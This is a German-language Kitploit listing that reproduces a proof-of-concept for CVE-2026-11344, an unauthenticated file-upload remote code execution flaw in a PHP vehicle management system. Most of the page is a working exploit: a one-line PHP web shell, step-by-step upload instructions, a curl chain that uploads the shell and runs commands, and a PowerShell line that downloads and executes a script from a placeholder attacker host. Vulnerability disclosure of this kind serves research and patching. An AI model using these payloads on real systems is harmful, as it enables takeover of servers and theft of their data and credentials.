Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-11344-RCE — Nicht authentifizierter Remote-Codeausführungs-Exploit für Vehicle Management System in PHP über uneingeschränkten Datei-Upload in newdriver.php und newvehicle.php, mit PoC und detaillierten Reproduktionsschritten. | Kitploit
Tools/GitHubGitHub/xmyronn/cve-2026-11344-rce
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubxmyronn/cve-2026-11344-rce

CVE-2026-11344-RCE

Nicht authentifizierter Remote-Codeausführungs-Exploit für Vehicle Management System in PHP über uneingeschränkten Datei-Upload in newdriver.php und newvehicle.php, mit PoC und detaillierten Reproduktionsschritten.

2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

Fahrzeugverwaltungssystem in PHP – Nicht authentifizierte Remote-Codeausführung durch Dateiupload in newdriver.php

Schwachstelleninformationen

FeldDetails
ProduktFahrzeugverwaltungssystem in PHP
Anbietercode-projects.org
VersionV1.0
SchwachstellentypUneingeschränkter Dateiupload, der zu Remote-Codeausführung führt (CWE-434)
Betroffene Dateiennewdriver.php, newvehicle.php
Parameterphoto (POST, multipart/form-data)
Authentifizierung erforderlichNein (nicht authentifiziert)
CVSS-Score10.0 Kritisch
AngriffsvektorRemote / Netzwerk
Erforderliche BerechtigungenKeine
BenutzerinteraktionKeine

Beschreibung

Das Fahrzeugverwaltungssystem in PHP V1.0 von code-projects.org ist anfällig für nicht authentifizierte Remote-Codeausführung durch uneingeschränkten Dateiupload in newdriver.php (und identisch in newvehicle.php).

Die Anwendung zeigt ein nur für Administratoren bestimmtes Registrierungsformular 'Neuer Fahrer' unter newdriver.php an, das ein Foto-Upload-Feld enthält. Der Endpunkt führt jedoch keine Sitzungsvalidierung durch – jeder nicht authentifizierte Angreifer kann direkt darauf zugreifen, ohne zur Anmeldung weitergeleitet zu werden. Darüber hinaus akzeptiert das Foto-Upload-Feld jeden Dateityp, einschließlich PHP-Dateien, ohne Erweiterungsfilterung, MIME-Typ-Validierung oder Inhaltsprüfung.

Ein Angreifer kann:

  1. newdriver.php ohne Sitzung oder Anmeldeinformationen direkt besuchen
  2. Das Fahrerformular mit einer PHP-Webshell als 'Foto' einreichen
  3. Die Shell wird im Verzeichnis /picture/ gespeichert
  4. Zur hochgeladenen Shell navigieren und beliebige Betriebssystembefehle auf dem Server ausführen

Dies führt zu vollständiger Remote-Codeausführung mit den Berechtigungen des Webserver-Prozesses.


Angriffskette

root@kitploit:~
Unauthenticated HTTP Request
        ↓
newdriver.php (no session check)
        ↓
photo field accepts .php file (no file type validation)
        ↓
Shell saved to /picture/web_shell.php
        ↓
GET /picture/web_shell.php?cmd=whoami
        ↓
RCE — arbitrary OS command execution

Schritte zur Reproduktion

Schritt 1 – Nicht authentifizierten Zugriff auf newdriver.php bestätigen

Öffnen Sie einen neuen Browser ohne Sitzung (Inkognito-/privates Fenster). Navigieren Sie direkt zum Endpunkt:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php

Das Formular 'Neuer Fahrer' wird erfolgreich geladen, ohne Authentifizierungsprüfung und ohne Weiterleitung zur Anmeldung.

Bildschirmfoto 2026-05-19 175610

Schritt 2 – Die PHP-Webshell vorbereiten

Erstellen Sie eine einfache PHP-Webshell zur Befehlsausführung:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Speichern Sie sie als shell.php (oder einen beliebigen .php-Dateinamen).


Schritt 3 – Das Formular mit der Webshell als Foto einreichen

Füllen Sie die Fahrerformularfelder mit beliebigen Werten aus und wählen Sie die PHP-Webshell als Foto-Upload aus:

root@kitploit:~
Fahrername:        test
Mobil:             1234567890
Fahrereintrittsdatum: 2026-05-19
Nationale ID:        test
Führerscheinnummer:         test
Führerschein-Enddatum:   2026-05-30
Fahreranschrift:     test
Foto:              shell.php   ← PHP-Webshell hier hochgeladen

Klicken Sie auf Abfrage senden.

Bildschirmfoto 2026-05-19 175622
Bildschirmfoto 2026-05-19 175708

Schritt 4 – Shell-Upload bestätigt

Die Anwendung antwortet mit "Registrierung abgeschlossen!" – was bestätigt, dass die PHP-Shell ohne Validierung akzeptiert und gespeichert wurde.

Bildschirmfoto 2026-05-19 175718

Schritt 5 – Beliebige Befehle über die hochgeladene Shell ausführen

Navigieren Sie zur hochgeladenen Shell im Verzeichnis /picture/ und übergeben Sie Betriebssystembefehle über den Parameter cmd:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami

Der Server führt den Befehl aus und gibt die Ausgabe zurück:

root@kitploit:~
desktop-g1i9np3\dell
Bildschirmfoto 2026-05-19 175759

Schritt 6 – Weitere Beispiele zur Befehlsausführung

root@kitploit:~
# Read sensitive files
http://TARGET/.../picture/shell.php?cmd=type+C:\xampp\htdocs\VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\newdriver.php

# List web root
http://TARGET/.../picture/shell.php?cmd=dir+C:\xampp\htdocs\

# Full reverse shell via PowerShell
http://TARGET/.../picture/shell.php?cmd=powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

Zweiter betroffener Endpunkt – newvehicle.php

Die identische Schwachstelle existiert in newvehicle.php. Ein nicht authentifizierter Angreifer kann auf das Formular 'Neues Fahrzeug hinzufügen' zugreifen, über das Fahrzeugfoto-Feld eine PHP-Webshell hochladen und auf dieselbe Weise RCE erreichen.

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newvehicle.php

Beide Endpunkte teilen dieselbe Ursache: keine Sitzungsvalidierung und keine Dateiupload-Beschränkungen.


curl PoC (Einzeiler)

root@kitploit:~
curl -s -X POST \
  "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php" \
  -F "dname=test" \
  -F "mobile=1234567890" \
  -F "djoiningdate=2026-05-19" \
  -F "nid=test" \
  -F "licenseno=test" \
  -F "licenseenddate=2026-05-30" \
  -F "daddress=test" \
  -F "[email protected];type=image/jpeg" \
  && echo "[+] Shell uploaded" \
  && curl -s "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami"

Auswirkungen

  • Nicht authentifizierte Remote-Codeausführung – jeder anonyme Angreifer im Netzwerk erreicht vollständige Betriebssystembefehlsausführung
  • Vollständige Serverkompromittierung – Lese-/Schreibzugriff auf alle Dateien, Anmeldeinformationen, Datenbankkonfiguration
  • Keine Interaktion erforderlich – vollautomatischer Exploit in einer einzigen HTTP-Anfrage
  • Zwei betroffene Endpunkte – newdriver.php und newvehicle.php sind beide anfällig

Betroffene Dateien

DateiUpload-FeldSpeicherpfad der Shell
newdriver.phpphoto/picture/
newvehicle.phpphoto/picture/

Anbieterinformationen

  • Anbieter-Startseite: https://code-projects.org/vehicle-management-system-in-php-with-source-code/
  • Download: https://code-projects.org/vehicle-management-system-in-php-with-source-code/

Entdeckt von

Syed Imad Uddin Alvi (imad alvi)
Unabhängiger Sicherheitsforscher

Tool herunterladen